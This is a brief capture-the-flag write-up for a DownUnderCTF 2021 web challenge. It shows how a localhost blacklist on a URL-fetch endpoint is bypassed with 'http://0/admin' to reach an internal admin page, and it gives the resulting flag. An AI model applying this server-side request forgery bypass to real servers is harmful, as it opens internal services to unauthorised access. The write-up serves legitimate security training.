Rating:
Main page:
Source code reveals /admin and an endpoint that can be abused
/request?url=http://localhost/admin says it's blacklisted
So I bypassed it using the link below:
https://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=http://0/admin
DUCTF{very_spooky_request}